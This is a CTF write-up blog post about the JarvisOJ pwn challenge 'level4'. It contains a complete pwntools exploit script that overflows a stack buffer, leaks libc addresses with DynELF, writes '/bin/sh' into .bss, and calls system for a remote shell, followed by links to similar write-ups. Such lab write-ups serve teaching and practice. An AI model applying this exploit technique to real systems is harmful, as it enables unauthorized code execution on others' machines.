Writeup of level4(Pwn) in JarvisOJ

最新推荐文章于 2021-11-15 19:28:59 发布
最新推荐文章于 2021-11-15 19:28:59 发布
阅读量1.2k 收藏
点赞数
分类专栏: PWN_of_CTF 文章标签: CTF pwn 函数 ROP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cossack9989/article/details/79330358
版权

大年初一浅浅地学了个leak?

0x00 What is DynELF?

pwntool-DynELF

详见官方文档咯~

0x01 checksec

root@kali:~/Desktop/Pwn/level4# checksec level4
[*] '/root/Desktop/Pwn/level4/level4'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

没有canary没有地址随机化而且栈不可执行,当然是来一发愉快的栈溢出(后来证明不止一发233333)

0x02 exp logic

扔进IDA,看伪代码(该elf中没有system没有bin/sh甚至连libc也没有)

int __cdecl main(int argc, const char **argv, const char **envp)
{
  vulnerable_function();
  write(1, "Hello, World!\n", 0xEu);
  return 0;
}
ssize_t vulnerable_function()
{
  char buf; // [sp+0h] [bp-88h]@1

  return read(0, &buf, 0x100u);
}


这可咋整啊?当然是leak啦(其实就是换一种方法获取system的真实地址)然后再想着法子把/bin/sh给写到bss或者data里(为什么不写到栈里呢?应该是因为退出vulnerable_function之后它所在的栈就被销毁了,此时system就无法执行'/bin/sh'了Orz)

0x03 exp script

先上脚本

from pwn import *
r=remote('pwn2.jarvisoj.com',9880)
elf=ELF('./level4')
plt_write=elf.plt['write']
plt_read=elf.plt['read']
#true_address?
vuladr=elf.symbols['vulnerable_function']
bssadr=elf.symbols['__bss_start']
#elf.bss() elf.symbols['__data_start'] also can be used

def leak(address):
	payload1='A'*(0x88+0x4)+p32(plt_write)+p32(vuladr)+p32(0x1)+p32(address)+p32(0x4)
	r.send(payload1)
	leak_address=r.recv(4)
	return leak_address

#leak critical functions' addresses
d=DynELF(leak,elf=ELF('./level4'))
sysadr=d.lookup('system','libc')
xitadr=d.lookup('exit','libc')

#read '/bin/sh' in bss segment
payload2='A'*(0x88+0x4)+p32(plt_read)+p32(vuladr)+p32(0x0)+p32(bssadr)+p32(0x8)
r.send(payload2)
r.send('/bin/sh\x00')

#pwn it!
payload3='A'*(0x88+0x4)+p32(sysadr)+p32(xitadr)+p32(bssadr)
r.send(payload3)

r.interactive()

这里有几点要注意,比如给write和read传参,首先得确定各个参数都得传些什么值,比如write和read的args列表都是(文件描述符,指向的缓冲区,写入内容大小);还有,比如我给read传参之后,指定了缓冲区地址,接下来就只需要再次send达到在bss段首输入'/bin/sh'的效果(切记!不能忘记截断符'\x00')

0x04 Notes

成功pwn下来之后又去看了看其他wp,发现还有大师傅用了ROPgadgets,码下来码下来

某位大师傅用ROPgadgets的例子

开源的ROPgadgets

C0ss4ck
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn溢出10道练习题有writeup
01-04
在这个场景中,"pwn溢出10道练习题有writeup" 提供了10个关于溢出的实战练习,每个题目都配有详细的解答,这对于学习和理解溢出漏洞原理及其利用技术非常有帮助。 溢出是由于程序在上分配的内存不足,...
linux函数没有返回值导致溢出,pwn的艺术浅谈(一):linux溢出
weixin_30621429的博客
05-03 403
这个系列主要介绍linux pwn的基础知识,包括堆漏洞的一些利用方法。这篇文章是这个系列的第一篇文章。这里我们以jarvisoj上的一些pwn题为例来对linux下溢出利用和的基本知识做一个简单的介绍。题目地址:https://www.jarvisoj.com/challenges。0. Level0,的基本结构及nx绕过首先查看一下题目的保护措施(如下图所示),可以看到是一个只开启了N...
CTF-PWN-level4(jarvis oj)
SuperGate的博客
02-18 288
这道题只出现了read函数以及write函数。checksec也只发现了NX。 这次并没有给出libc的文件,所以我们可以考虑使用pwntools中的DynELF泄漏system地址,然后将'/bin/sh'写入.bss段中保存,在调用system函数的时候载入.bss保存的相应地址即可 exp如下 from pwn import * context(os='linux',arch='i3...
Jarvis OJ Level4
qq_39153421的博客
09-19 377
写在最前面:  在漏洞利用的时候,如果没有给出libc库,可以先泄漏两个函数的地址,然后再去查libc的版本号。但是,这种有时候可能失效。现在利用DynELF工具来泄漏system函数的地址,然后再往一个地方写’/bin/sh’字符串并构造调用system函数。下面以Jarvis OJ中的level4这道题为例,使用DynELF实现漏洞利用。   在写之前先了解...
Jarvis OJ --level4
Kni9hT's Blog
11-11 247
level4与level1、2、3的区别在于:无system、无"/bin/sh"、无libc 要点:使用DynELF函数leak system函数真实地址,然后用read函数写"/bin/sh\x00"到bss段,然后调用system("/bin/sh")去getshell。 题目链接: level4.0f9cfa0b7bb6c0f9e030a5541b46e9f0 先查看开了哪些保护: 和l...
[BUUCTF]PWN——level4
mcmuyanga的博客
11-03 286
level4 附件 步骤: 例行检查,32位程序,开启了NX保护 运行一下程序,看看大概的情况 32位ida载入,首先检索程序里的字符串,根据上一步运行看到的字符串进行跳转 输入点在function里 参数buf存在溢出漏洞,字符串里没有找到现成的后门可以利用,所以使用ret2libc的方法来获取shell 利用过程: 泄露libc版本 只能通过程序里已经调用过的函数才行,这里利用的read函数 read_got=elf.got['read'] write_plt=elf.plt['writ
De1ctf 2020 -‘check in’ writeup
01-09
CTF(Capture The Flag)竞赛中,"De1ctf 2020 - ‘check in’" 是一道挑战性的安全题目,主要涉及到多个网络安全技术的综合运用,特别是与Web应用程序安全相关的方面。该题目的核心是通过理解并利用服务器配置中...
2020 蓝帽杯线下赛PWN WriteUp .pdf
09-05
本文主要涉及的是网络安全领域的Pwn(利用漏洞攻防)技术,具体是针对2020年蓝帽杯线下赛中的一个Pwn题目进行的WriteUp(解题报告)。Pwn类题目通常涉及到缓冲区溢出、格式字符串漏洞、整数溢出等,目标是通过编写...
2023 强网杯 Writeup
最新发布
01-29
CTF Writeup 2023 强网杯 Writeup 是一篇关于 Capture The Flag(CTF)的 writeup,内容涵盖了多个挑战题目,涉及到 Python、 Cryptography、Reverse Engineering、Web 等多个领域。下面是对每个挑战题目的详细分析...
[SECT2019] —writeup撰写.docx
11-28
writeup CTF
JarvisOJ level4
PLpa的博客
07-08 2260
这题与level3相比就是就是题目并没有给出对应的libc文件,这里就要学习使用一波DynELF函数了,这是pwntools的一个函数,使用前请确认安装完整pwntools工具。 前言: DynELF函数是通过已知函数,迅速查找libc库,并不需要我们自己本身知道对应版本的libc文件。 这是DynELF函数使用的一个模板: def leak(address): payload=pad+p...
XCTF pwn例题思路整理 侵删
londonyan的博客
11-15 3902
XCTF pwn例题思路整理 侵删 1 .decode("iso-8859-1")处理报错 2 read() 溢出 函数定义:ssize_t read(int fd, void * buf, size_t count); 函数说明:read()会把参数fd所指的文件传送count 个字节到buf 指针所指的内存中。 返回值:返回值为实际读取到的字节数, 如果返回0, 表示已到达文...
level3 [XCTF-PWN]CTF writeup系列11-新手练习区大结局
重新启程
12-20 961
题目地址:level3 看看题目内容 从题目中可以看出,本题应该是一个没有提供system函数地址的溢出题目,那么我们本题的考点应该是从libc中提取system函数地址。 照例检查保护机制 root@mypwn:/ctf/work/python# checksec level3 [*] '/ctf/work/python/level3' Arch: i386-3...
jarvis oj level4
发蝴蝶和大脑斧的博客
12-05 596
level3相比没有提供libc.so文件。学习使用Dynelf: def leak(address):
(Jarvis Oj)(Pwn) level4
Nothing
05-01 1145
(Jarvis Oj)(Pwn) level4 先看一下保护措施,没什么奇怪的地方。 这次并没有给libc的文件,开始通过泄露得到的__libc_start_main地址对照libc库,并没有成功。于是就学了一波DynELF,这个模块的原理还是不太清楚(玄学),以后来填。总之利用这个模块可以找到system的地址,但是找不到”/bin/sh”这个字符串位置,但是我们可以控制read函数,所...
jarvisoj level4 wp ROP及DynELF模块
ditto的博客
12-31 513
拿到题目 开启了NX。 放IDA里: 溢出。 程序本身没有调用system函数 无法ret2plt。 且题目本身没有给出目标的动态库的版本。题目本身有write函数,可以泄露内存,则可以利用pwntools的DynELF模块,找到system函数。 本身程序段没有/bin/sh的字符串,则需要使用read函数将字符串读入,read函数有三个参数,这就需要pop pop pop ret这...
JarvisOJ Web&Reverse&Pwn
热门推荐
4ct10n
11-16 5万+
Web 0x01 phpinfo 0x02 WEB 0x03 Easy Gallery 0x04 Login 0x05 PORT51 0x06 LOCALHOST 0x07 神盾局的秘密 0x08 IN A Mess 0x09 api调用 0x0a Simple Injection 0x0b 图片上传漏洞 0x0c chopper 0x0b flag在管理员手里 Reverse 0x01FindK
(Jarvis Oj)(Pwn) level5
Nothing
05-03 2040
(Jarvis Oj)(Pwn) level5 题目描述:mmap和mprotect练习,假设system和execve函数被禁用,请尝试使用mmap和mprotect完成本题。附件和level3_x64的附件一样。 首先去看看这个mmap函数和mprotect函数是干啥的。 void* mmap(void* addr, size_t len, int port, int flag, int...
xman level4//一步一步rop level2 writeup
u014281987的博客
08-29 866
这道题在没libc的情况下考泄露地址,两个方法,一个read之后直接pop三个参数再返回system,另一个重新返回vulnerable,只不过read(8字节),所以是send,不是sendline啊 另外一个大坑点在dynelf的使用,只能通过它泄漏偏移,然后用不带它的再写一遍,原理据师傅说是“DynELF是先算出bin的基地址,然后把符号表翻一遍,接着就知道libc的基地址了,然后把li
HFCTF2022线上赛官方Writeup:WEB、CRYPTO与PWN挑战解析
"HFCTF2022线上赛官方Writeup1主要涵盖了多个网络安全和编程挑战,包括WEB、CRYPTO、PWN、REVERSE和MISC等类别。其中,题目涉及了RSA加密、MD5哈希、zlib压缩、SSRF漏洞利用、元数据解析、动态链接器预加载(ld_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值